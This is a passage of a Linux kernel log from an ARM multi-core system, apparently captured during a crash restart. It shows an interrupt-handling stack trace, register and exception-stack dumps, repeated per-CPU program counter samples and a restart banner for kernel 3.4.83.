[  145.512695]  r6:c09ddc50 r5:c09dc844 r4:00000001 r3:c0a0e950
[  145.519714] [<c0698ba0>] (dump_stack+0x0/0x1c) from [<c0019bd8>] (handle_IPI+0x190/0x1c4)
[  145.528961] [<c0019a48>] (handle_IPI+0x0/0x1c4) from [<c00084fc>] (gic_handle_irq+0x58/0x60)
[  145.538482] [<c00084a4>] (gic_handle_irq+0x0/0x60) from [<c06a5540>] (__irq_usr+0x40/0x60)
[  145.547637] Exception stack(0xd85a5fb0 to 0xd85a5ff8)
[  145.553466] 5fa0:                                     41822290 418185e8 00000001 41c95000
[  145.562561] 5fc0: 418185e8 41687460 4010d0ec 418185e8 4010d038 41689398 7fffffff 401602ec
[  145.571777] 5fe0: 418191e8 5ba34d10 41609aa8 41609974 200b0010 ffffffff
[  145.579284]  r6:ffffffff r5:200b0010 r4:41609974 r3:41822290
[  145.586364] CPU0 PC (0) : 0xc003ee38
[  145.590576] CPU0 PC (1) : 0xc003ee54
[  145.594635] CPU0 PC (2) : 0xc003ee54
[  145.598693] CPU0 PC (3) : 0xc003ee54
[  145.602722] CPU0 PC (4) : 0xc003ee54
[  145.606781] CPU0 PC (5) : 0xc003ee54
[  145.610839] CPU0 PC (6) : 0xc003ee54
[  145.614898] CPU0 PC (7) : 0xc003ee54
[  145.619110] CPU0 PC (8) : 0xc003ee54
[  145.623168] CPU0 PC (9) : 0xc003ee54
[  145.627227] CPU1 PC (0) : 0xc0019b2c
[  145.631408] CPU1 PC (1) : 0xc0019b2c
[  145.635467] CPU1 PC (2) : 0xc0019b2c
[  145.639495] CPU1 PC (3) : 0xc0019b2c
[  145.643707] CPU1 PC (4) : 0xc0019b2c
[  145.647766] CPU1 PC (5) : 0xc0019b2c
[  145.651824] CPU1 PC (6) : 0xc0019b2c
[  145.656005] CPU1 PC (7) : 0xc0019b2c
[  145.660064] CPU1 PC (8) : 0xc0019b2c
[  145.664123] CPU1 PC (9) : 0xc0019b2c
[  145.668182] 
[  145.669952] Restarting Linux version 3.4.83-gd2afc0bae69 (build@14-use1a-b-39) (gcc version 4.7 (GCC) ) #1 SMP PREEMPT Tue Sep 19 22:04:47 UTC 2017
[  145.669982]